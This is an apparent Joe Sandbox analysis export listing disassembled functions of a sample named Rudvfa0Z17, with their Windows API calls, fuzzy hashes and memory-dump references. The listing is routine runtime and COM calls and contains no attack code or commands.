                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_Rudvfa0Z17.jbxd
                                Similarity
                                • API ID: _free$AtomDeleteGlobal$H_prolog3_catch_
                                • String ID:
                                • API String ID: 1844215989-0
                                • Opcode ID: 22c24c3c4b21b6d19984e6902b00b1a94ce3029435d0ccd71c37655f779d9770
                                • Instruction ID: 48c2eb9c913118c4735217a8a00d77398e2e174d0bec328fecf9b45859ffdf8e
                                • Opcode Fuzzy Hash: 22c24c3c4b21b6d19984e6902b00b1a94ce3029435d0ccd71c37655f779d9770
                                • Instruction Fuzzy Hash: 12313D30601741DFDB24EF64C899AA9BFE2BF44304F54846CF19A8B6B2CBB19D80CB55
                                Function 005475A7 Relevance: 12.1, APIs: 8, Instructions: 80memorystringCOMMON
                                Download Yara Rule
                                APIs
                                • __EH_prolog3.LIBCMT ref: 005475AE
                                • SysAllocString.OLEAUT32(?), ref: 0054767C
                                  • Part of subcall function 0054C959: _memset.LIBCMT ref: 0054C96B
                                • lstrlenW.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,00000000,00000001,?), ref: 005475E8
                                • VariantClear.OLEAUT32(?), ref: 00547654
                                • VariantClear.OLEAUT32(?), ref: 0054765A
                                • VariantClear.OLEAUT32(?), ref: 00547660
                                • VariantClear.OLEAUT32(00000000), ref: 00547666
                                • SysFreeString.OLEAUT32(?), ref: 0054766B
                                Memory Dump Source
                                • Source File: 00000000.00000002.3259571591.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.3259547600.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3259790423.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3259841468.0000000000724000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3259859540.000000000072E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3259878862.0000000000735000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3259895985.000000000073A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3259912698.0000000000741000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_Rudvfa0Z17.jbxd
                                Similarity
                                • API ID: ClearVariant$String$AllocFreeH_prolog3_memsetlstrlen
                                • String ID:
                                • API String ID: 2053117175-0
                                • Opcode ID: 2a50d400dccc53430de0076eedc0f0a48ce636d3b7619acd097371a26fd5eb3c
                                • Instruction ID: dd4d0c44e6f298f852898ebe73055f83b3dd5b9e94302fefdb8e4aa343dd379a
                                • Opcode Fuzzy Hash: 2a50d400dccc53430de0076eedc0f0a48ce636d3b7619acd097371a26fd5eb3c
                                • Instruction Fuzzy Hash: 64313C7180014EEFDF11EFA0DC48AED7FB9EF58344F108019F905AB151DA359A55DB61
                                Function 026D356E Relevance: 10.7, APIs: 7, Instructions: 151COMMON
                                Download Yara Rule
                                APIs
                                • VariantInit.OLEAUT32(?), ref: 026D3580
                                • CoInitialize.OLE32(00000000), ref: 026D3587
                                • SafeArrayAccessData.OLEAUT32(?,?), ref: 026D3667
                                • SafeArrayGetLBound.OLEAUT32(?,00000001,?), ref: 026D367A
                                • SafeArrayGetUBound.OLEAUT32(?,00000001,?), ref: 026D3689
                                Memory Dump Source
                                • Source File: 00000000.00000002.3260594624.00000000026D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 026D0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_26d0000_Rudvfa0Z17.jbxd
                                Similarity
                                • API ID: ArraySafe$Bound$AccessDataInitInitializeVariant
                                • String ID:
                                • API String ID: 1770467583-0
                                • Opcode ID: c0c3d5d2c829e32bcd8bcd4ba14b769915719691fda59041b1900c6aa967e1cc
                                • Instruction ID: 3d8f2b16da4f368b3d8c346c727c4235a68f50ac8a13ad384ea4a46351a6219f
                                • Opcode Fuzzy Hash: c0c3d5d2c829e32bcd8bcd4ba14b769915719691fda59041b1900c6aa967e1cc
                                • Instruction Fuzzy Hash: FB513875E01659AFEF01DFA4CC88AEEBB79EF09304B104499EA01EB320D771DA158B91
                                Function 1000356A Relevance: 10.7, APIs: 7, Instructions: 151COMMON
                                Download Yara Rule
                                APIs
                                • VariantInit.OLEAUT32(?), ref: 1000357C
                                • CoInitialize.OLE32(00000000), ref: 10003583
                                • SafeArrayAccessData.OLEAUT32(?,?), ref: 10003663
                                • SafeArrayGetLBound.OLEAUT32(?,00000001,?), ref: 10003676
                                • SafeArrayGetUBound.OLEAUT32(?,00000001,?), ref: 10003685
                                Memory Dump Source
                                • Source File: 00000000.00000002.3261197301.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10001000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_10001000_Rudvfa0Z17.jbxd
                                Similarity
                                • API ID: ArraySafe$Bound$AccessDataInitInitializeVariant
                                • String ID:
                                • API String ID: 1770467583-0
                                • Opcode ID: c0c3d5d2c829e32bcd8bcd4ba14b769915719691fda59041b1900c6aa967e1cc
                                • Instruction ID: 6a08fc82bc3730ba37a0e2c4be62a39793870260165c286fe321372d819fc844
                                • Opcode Fuzzy Hash: c0c3d5d2c829e32bcd8bcd4ba14b769915719691fda59041b1900c6aa967e1cc
                                • Instruction Fuzzy Hash: CE515D71A00619BFEB02DFA4CC88AAFBBBDEF45344F108459F901EB224D772DA058B50
                                Function 00424FE0 Relevance: 10.6, APIs: 7, Instructions: 125COMMON
                                Download Yara Rule
                                APIs
                                • _malloc.LIBCMT ref: 00424FEF
                                  • Part of subcall function 0063A2D7: __FF_MSGBANNER.LIBCMT ref: 0063A2F0
                                  • Part of subcall function 0063A2D7: __NMSG_WRITE.LIBCMT ref: 0063A2F7
                                  • Part of subcall function 0063A2D7: RtlAllocateHeap.NTDLL(00000000,00000001,00000001,00000000,00000000,?,00646709,00000000,00000001,00000000,?,00649909,00000018,0071ACE0,0000000C,00649999), ref: 0063A31C
                                • _free.LIBCMT ref: 00425013
                                • _memset.LIBCMT ref: 00425074
                                • CreateDIBSection.GDI32(00000000,00000008,00000000,00000008,00000000,00000000), ref: 00425089
                                • _free.LIBCMT ref: 0042509A
                                  • Part of subcall function 00638E31: HeapFree.KERNEL32(00000000,00000000,?,0040201B,?,3F7259E2), ref: 00638E47
                                • _memcpy_s.LIBCMT ref: 004250C0
                                • _free.LIBCMT ref: 0042510A
                                Memory Dump Source
                                • Source File: 00000000.00000002.3259571591.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.3259547600.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3259790423.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3259841468.0000000000724000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3259859540.000000000072E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3259878862.0000000000735000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3259895985.000000000073A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3259912698.0000000000741000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_Rudvfa0Z17.jbxd
                                Similarity
                                • API ID: _free$Heap$AllocateCreateFreeSection_malloc_memcpy_s_memset
                                • String ID:
                                • API String ID: 3083015433-0
                                • Opcode ID: da58268f5152990dcaa61327567e6c040b37fab0ab98cc9776ccf8020c36bc0e
                                • Instruction ID: 360f0078a5988b9aa22d51a7b1d2b6352d301195ba829fd668ebaa24be426122
                                • Opcode Fuzzy Hash: da58268f5152990dcaa61327567e6c040b37fab0ab98cc9776ccf8020c36bc0e
                                • Instruction Fuzzy Hash: AC41F076A00B105FE320DF25EC41BA7B7E5AF84720F54842EE949CB352EB75E910CB98
                                Function 0053E5DF Relevance: 10.6, APIs: 7, Instructions: 117windowCOMMON
                                Download Yara Rule
                                APIs
                                • GetParent.USER32(?), ref: 0053E612
                                • PeekMessageW.USER32(004114B0,00000000,00000000,00000000,00000000), ref: 0053E636
                                • UpdateWindow.USER32(?), ref: 0053E651
                                • SendMessageW.USER32(00000024,00000121,00000000,?), ref: 0053E672
                                • SendMessageW.USER32(?,0000036A,00000000,00000002), ref: 0053E68A
                                • UpdateWindow.USER32(?), ref: 0053E6CD
                                • PeekMessageW.USER32(004114B0,00000000,00000000,00000000,00000000), ref: 0053E6FE
                                  • Part of subcall function 0053B5F7: GetWindowLongW.USER32(?,000000F0), ref: 0053B602
                                Memory Dump Source
                                • Source File: 00000000.00000002.3259571591.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.3259547600.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3259790423.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3259841468.0000000000724000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3259859540.000000000072E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3259878862.0000000000735000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3259895985.000000000073A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3259912698.0000000000741000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_Rudvfa0Z17.jbxd
                                Similarity
                                • API ID: Message$Window$PeekSendUpdate$LongParent
                                • String ID:
                                • API String ID: 2853195852-0
                                • Opcode ID: bf5034fef45aed2f1f820b7ba5d37124e34f0dd0f8c4dc400c1294b4b1013a2a
                                • Instruction ID: 61a98ce6f9eafbb864f9943975ccc99499e40b493fb2bc4ba56c0af499a80e57
                                • Opcode Fuzzy Hash: bf5034fef45aed2f1f820b7ba5d37124e34f0dd0f8c4dc400c1294b4b1013a2a
                                • Instruction Fuzzy Hash: 54417B3090078AABDF219FA5DC8AEAEBFF5FF91744F108529E442A61A1DB718940DB10
                                Function 00405B60 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 115COMMON
                                Download Yara Rule
                                APIs
                                • std::exception::exception.LIBCMT ref: 00405C00
                                  • Part of subcall function 00638987: std::exception::_Copy_str.LIBCMT ref: 006389A2
                                • __CxxThrowException@8.LIBCMT ref: 00405C15
                                  • Part of subcall function 00641C89: RaiseException.KERNEL32(00401FC3,?,3F7259E2,006FC518,00401FC3,?,0071C220,?,3F7259E2), ref: 00641CCB
                                  • Part of subcall function 00405D90: std::exception::exception.LIBCMT ref: 00405DC5
                                  • Part of subcall function 00405D90: __CxxThrowException@8.LIBCMT ref: 00405DDA
                                • _memmove.LIBCMT ref: 00405C5E
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.3259571591.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.3259547600.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3259790423.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3259841468.0000000000724000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3259859540.000000000072E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3259878862.0000000000735000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3259895985.000000000073A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3259912698.0000000000741000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_Rudvfa0Z17.jbxd
                                Similarity
                                • API ID: Exception@8Throwstd::exception::exception$Copy_strExceptionRaise_memmovestd::exception::_
                                • String ID: Yr?$Yr?$Yr?
                                • API String ID: 163498487-2131404991
                                • Opcode ID: 373fe735c4f5fc144fa1b0b1a1a1a81d27f11298dd39c5a8450c379fcc71d819
                                • Instruction ID: aa7314c04cc76cef786d436b9f62b448d7d3602e595ec7d8bf3173309c8bc3a9
                                • Opcode Fuzzy Hash: 373fe735c4f5fc144fa1b0b1a1a1a81d27f11298dd39c5a8450c379fcc71d819
                                • Instruction Fuzzy Hash: C34191B1A04605ABCB14DF68C8816AFB7F9FB44310F20423EE826A7780D774A9448BA5
                                Function 026D9173 Relevance: 10.6, APIs: 7, Instructions: 114COMMON
                                Download Yara Rule
                                APIs
                                • GetFileAttributesA.KERNEL32(?,?,0000000D,?), ref: 026D91D8
                                • CreateDirectoryA.KERNEL32(?,00000000,?,0000000D,?), ref: 026D91EC
                                • __fassign.LIBCMT ref: 026D919F
                                  • Part of subcall function 026DBE5F: __mbsnbcpy_l.LIBCMT ref: 026DBE6F
                                • __fassign.LIBCMT ref: 026D9257
                                • __fassign.LIBCMT ref: 026D9286
                                • GetFileAttributesA.KERNEL32(00000000,?,0000000D,?), ref: 026D9299
                                • CreateDirectoryA.KERNEL32(00000000,00000000,?,0000000D,?), ref: 026D92AD
                                Memory Dump Source
                                • Source File: 00000000.00000002.3260594624.00000000026D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 026D0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_26d0000_Rudvfa0Z17.jbxd
                                Similarity
                                • API ID: __fassign$AttributesCreateDirectoryFile$__mbsnbcpy_l
                                • String ID:
                                • API String ID: 2854908881-0
                                • Opcode ID: d39bb7027f6251b25b08e012973c6ff04273f925ee12b3df7fdcad5c3bd8eb85
                                • Instruction ID: 845d0e2217c2de6a4e4c1b6c939bd0100c45c547745351fe16f1b61f4d0ecc29
                                • Opcode Fuzzy Hash: d39bb7027f6251b25b08e012973c6ff04273f925ee12b3df7fdcad5c3bd8eb85
                                • Instruction Fuzzy Hash: 3941E4B1D0525C5ADF20DB789CCCBEAB7AD9B05304F5441E9D999D3282DB708B8CCBA0
                                Function 00404C10 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 110COMMON
                                Download Yara Rule
                                APIs
                                • std::_Xinvalid_argument.LIBCPMT ref: 00404C2A
                                  • Part of subcall function 0065BDA1: std::exception::exception.LIBCMT ref: 0065BDB6
                                  • Part of subcall function 0065BDA1: __CxxThrowException@8.LIBCMT ref: 0065BDCB
                                  • Part of subcall function 0065BDA1: std::exception::exception.LIBCMT ref: 0065BDDC
                                • std::_Xinvalid_argument.LIBCPMT ref: 00404C6A
                                  • Part of subcall function 0065BD54: std::exception::exception.LIBCMT ref: 0065BD69
                                  • Part of subcall function 0065BD54: __CxxThrowException@8.LIBCMT ref: 0065BD7E
                                  • Part of subcall function 0065BD54: std::exception::exception.LIBCMT ref: 0065BD8F
                                • _memmove.LIBCMT ref: 00404CD6
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.3259571591.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.3259547600.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3259790423.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3259841468.0000000000724000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3259859540.000000000072E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3259878862.0000000000735000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3259895985.000000000073A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3259912698.0000000000741000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_Rudvfa0Z17.jbxd
                                Similarity
                                • API ID: std::exception::exception$Exception@8ThrowXinvalid_argumentstd::_$_memmove
                                • String ID: invalid string position$string too long$Yr?
                                • API String ID: 1615890066-2283019175
                                • Opcode ID: 8cf94c5e2ab0962ed1a99ecdfa077e95bb3b89be6ee8aaed87cfbdd882414eea
                                • Instruction ID: 09d298bdaee62a18382292498f2c0fcfb31ea0c3e6b8f72883f7026a4db5369d
                                • Opcode Fuzzy Hash: 8cf94c5e2ab0962ed1a99ecdfa077e95bb3b89be6ee8aaed87cfbdd882414eea
                                • Instruction Fuzzy Hash: 373107733092149BD710DE5CE88092FF3AAEFE5725722463FF601DB290DA759C0187A8
                                Function 0042D550 Relevance: 10.6, APIs: 7, Instructions: 110COMMON
                                Download Yara Rule
                                APIs
                                • _memset.LIBCMT ref: 0042D5F0
                                • VerSetConditionMask.KERNEL32(00000000,00000000,00000002,?), ref: 0042D642
                                • VerSetConditionMask.KERNEL32(00000000,?,00000001,?), ref: 0042D64F
                                • VerSetConditionMask.KERNEL32(00000000,?,00000020,?,?,00000001,?), ref: 0042D65C
                                • VerSetConditionMask.KERNEL32(00000000,?,00000010,?,?,00000020,?,?,00000001,?), ref: 0042D669
                                • VerSetConditionMask.KERNEL32(00000000,?,00000008,00000001,?,00000010,?,?,00000020,?,?,00000001,?), ref: 0042D675
                                • VerifyVersionInfoA.KERNEL32(0000009C,00000033,00000000), ref: 0042D682
                                Memory Dump Source
                                • Source File: 00000000.00000002.3259571591.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.3259547600.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3259790423.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3259841468.0000000000724000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3259859540.000000000072E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3259878862.0000000000735000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3259895985.000000000073A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3259912698.0000000000741000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_Rudvfa0Z17.jbxd
                                Similarity
                                • API ID: ConditionMask$InfoVerifyVersion_memset
                                • String ID:
                                • API String ID: 3299124433-0
                                • Opcode ID: d3ef0d53f1839c9e3bf1850531eb811aee1c8a145011ea7e9c5a9df1899ed0bd
                                • Instruction ID: a0167c8f1a74232b0136c7fe2438c6576a0bff57e9e5d0e349309cf03c2c5f55
                                • Opcode Fuzzy Hash: d3ef0d53f1839c9e3bf1850531eb811aee1c8a145011ea7e9c5a9df1899ed0bd
                                • Instruction Fuzzy Hash: 17415470F043ACEEEF20CB649C45BAA7B79AB55700F4041CAE54D6B282C7B55E84CF66
                                Function 026DEBC4 Relevance: 10.6, APIs: 7, Instructions: 109memorythreadCOMMONLIBRARYCODE
                                Download Yara Rule
                                APIs
                                • GetModuleHandleW.KERNEL32(100189E4,?,026DC2D7,1001D1F0,00000008,026DC46B,?,?,?,1001D210,0000000C,026DC526,?), ref: 026DEBCC
                                • __mtterm.LIBCMT ref: 026DEBD8
                                  • Part of subcall function 026DE8A3: RtlDecodePointer.NTDLL(100209BC), ref: 026DE8B4
                                  • Part of subcall function 026DE8A3: TlsFree.KERNEL32(100209C0,026DC39A,026DC380,1001D1F0,00000008,026DC46B,?,?,?,1001D210,0000000C,026DC526,?), ref: 026DE8CE
                                  • Part of subcall function 026DE8A3: _free.LIBCMT ref: 026DF6C6
                                • TlsAlloc.KERNEL32(?,?,026DC2D7,1001D1F0,00000008,026DC46B,?,?,?,1001D210,0000000C,026DC526,?), ref: 026DEC65
                                • __init_pointers.LIBCMT ref: 026DEC8A
                                • __calloc_crt.LIBCMT ref: 026DECF8
                                • GetCurrentThreadId.KERNEL32 ref: 026DED24
                                Memory Dump Source
                                • Source File: 00000000.00000002.3260594624.00000000026D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 026D0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_26d0000_Rudvfa0Z17.jbxd
                                Similarity
                                • API ID: AllocCurrentDecodeFreeHandleModulePointerThread__calloc_crt__init_pointers__mtterm_free
                                • String ID:
                                • API String ID: 347030822-0
                                • Opcode ID: 2465f0a14bcac396a0c33370bd3830e107fa2acc38513c658810efa9718ea0a3
                                • Instruction ID: 4776dbe5f4273c65e8ca6f6a865cd2ce16bcb87751b225d795df4f736c98c701
                                • Opcode Fuzzy Hash: 2465f0a14bcac396a0c33370bd3830e107fa2acc38513c658810efa9718ea0a3
                                • Instruction Fuzzy Hash: EA318679C40A38DFF711AF758C886963AA5EF94364B244A6EE412D72B0EB359142CF50
                                Function 1000EBC0 Relevance: 10.6, APIs: 7, Instructions: 109memorythreadCOMMONLIBRARYCODE
                                Download Yara Rule
                                APIs
                                • GetModuleHandleW.KERNEL32(100189E4,?,1000C2D3,1001D1F0,00000008,1000C467,?,?,?,1001D210,0000000C,1000C522,?), ref: 1000EBC8
                                • __mtterm.LIBCMT ref: 1000EBD4
                                  • Part of subcall function 1000E89F: RtlDecodePointer.NTDLL(100209BC), ref: 1000E8B0
                                  • Part of subcall function 1000E89F: TlsFree.KERNEL32(100209C0,1000C396,1000C37C,1001D1F0,00000008,1000C467,?,?,?,1001D210,0000000C,1000C522,?), ref: 1000E8CA
                                  • Part of subcall function 1000E89F: _free.LIBCMT ref: 1000F6C2
                                • TlsAlloc.KERNEL32(?,?,1000C2D3,1001D1F0,00000008,1000C467,?,?,?,1001D210,0000000C,1000C522,?), ref: 1000EC61
                                • __init_pointers.LIBCMT ref: 1000EC86
                                • __calloc_crt.LIBCMT ref: 1000ECF4
                                • GetCurrentThreadId.KERNEL32 ref: 1000ED20
                                Memory Dump Source
                                • Source File: 00000000.00000002.3261197301.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10001000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_10001000_Rudvfa0Z17.jbxd
                                Similarity
                                • API ID: AllocCurrentDecodeFreeHandleModulePointerThread__calloc_crt__init_pointers__mtterm_free
                                • String ID:
                                • API String ID: 347030822-0
                                • Opcode ID: 2465f0a14bcac396a0c33370bd3830e107fa2acc38513c658810efa9718ea0a3
                                • Instruction ID: bb4694bb5c9a658c6d9950f541a17c18304243beb40d45fd1c97dd1bb193a613
                                • Opcode Fuzzy Hash: 2465f0a14bcac396a0c33370bd3830e107fa2acc38513c658810efa9718ea0a3
                                • Instruction Fuzzy Hash: 5A31C239C41A74EFF751DF748C8468A3EA4EF953A0B20466EE402E21B4DB34CA42CF40
                                Function 00405520 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 106COMMON
                                Download Yara Rule
                                APIs
                                • std::_Xinvalid_argument.LIBCPMT ref: 00405539
                                  • Part of subcall function 0065BDA1: std::exception::exception.LIBCMT ref: 0065BDB6
                                  • Part of subcall function 0065BDA1: __CxxThrowException@8.LIBCMT ref: 0065BDCB
                                  • Part of subcall function 0065BDA1: std::exception::exception.LIBCMT ref: 0065BDDC
                                • std::_Xinvalid_argument.LIBCPMT ref: 0040555A
                                • std::_Xinvalid_argument.LIBCPMT ref: 00405578
                                • _memmove.LIBCMT ref: 004055EF
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.3259571591.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.3259547600.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3259790423.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3259841468.0000000000724000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3259859540.000000000072E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3259878862.0000000000735000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3259895985.000000000073A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3259912698.0000000000741000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_Rudvfa0Z17.jbxd
                                Similarity
                                • API ID: Xinvalid_argumentstd::_$std::exception::exception$Exception@8Throw_memmove
                                • String ID: invalid string position$string too long
                                • API String ID: 443534600-4289949731
                                • Opcode ID: 66606227c3be837befd3c4275abdea4d1c8e0940e776b2db282814a0a66f2dcd
                                • Instruction ID: 82526b9a656a89521d1cc6155e20f064ad69c051c4c73cc3db6df7d088c1ea27
                                • Opcode Fuzzy Hash: 66606227c3be837befd3c4275abdea4d1c8e0940e776b2db282814a0a66f2dcd
                                • Instruction Fuzzy Hash: FD31B4327047149BC724DF68E88082BB3B7EFD57207104A3FE556DB294DB74D9448BA8
                                Function 00401D30 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 100COMMON
                                Download Yara Rule
                                APIs
                                • std::_Xinvalid_argument.LIBCPMT ref: 00401D49
                                  • Part of subcall function 0065BDA1: std::exception::exception.LIBCMT ref: 0065BDB6
                                  • Part of subcall function 0065BDA1: __CxxThrowException@8.LIBCMT ref: 0065BDCB
                                  • Part of subcall function 0065BDA1: std::exception::exception.LIBCMT ref: 0065BDDC
                                • std::_Xinvalid_argument.LIBCPMT ref: 00401D6A
                                • std::_Xinvalid_argument.LIBCPMT ref: 00401D85
                                • _memmove.LIBCMT ref: 00401DED
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.3259571591.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.3259547600.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3259790423.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3259841468.0000000000724000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3259859540.000000000072E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3259878862.0000000000735000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3259895985.000000000073A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3259912698.0000000000741000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_Rudvfa0Z17.jbxd
                                Similarity
                                • API ID: Xinvalid_argumentstd::_$std::exception::exception$Exception@8Throw_memmove
                                • String ID: invalid string position$string too long
                                • API String ID: 443534600-4289949731
                                • Opcode ID: fb006089ef734ae445a4013f076dbe047356ea60279261c151c10134b43e82eb
                                • Instruction ID: 5e384d3fcd57fe90cd880de6c387c4710e0ccccbc07b491ad084651309c3f517
                                • Opcode Fuzzy Hash: fb006089ef734ae445a4013f076dbe047356ea60279261c151c10134b43e82eb
                                • Instruction Fuzzy Hash: EE3186323042148BD724DE5CE980A6AF3EAEF91765F100A3FF552DB2E1D774E8408799
                                Function 004021C0 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 55COMMONLIBRARYCODE
                                Download Yara Rule
                                APIs
                                • std::_Lockit::_Lockit.LIBCPMT ref: 004021EF
                                • std::exception::exception.LIBCMT ref: 00402228
                                  • Part of subcall function 00638987: std::exception::_Copy_str.LIBCMT ref: 006389A2
                                • __CxxThrowException@8.LIBCMT ref: 0040223D
                                  • Part of subcall function 00641C89: RaiseException.KERNEL32(00401FC3,?,3F7259E2,006FC518,00401FC3,?,0071C220,?,3F7259E2), ref: 00641CCB
                                • std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 00402244
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.3259571591.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.3259547600.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3259790423.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3259841468.0000000000724000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3259859540.000000000072E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3259878862.0000000000735000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3259895985.000000000073A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3259912698.0000000000741000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_Rudvfa0Z17.jbxd
                                Similarity
                                • API ID: std::_$Copy_strExceptionException@8Locinfo::_Locinfo_ctorLockitLockit::_RaiseThrowstd::exception::_std::exception::exception
                                • String ID: bad locale name$Yr?
                                • API String ID: 73090415-388437437
                                • Opcode ID: e444c0e42f906dcbddc2727c2d64d1d77e0876490b577f2cd922582846f8c114
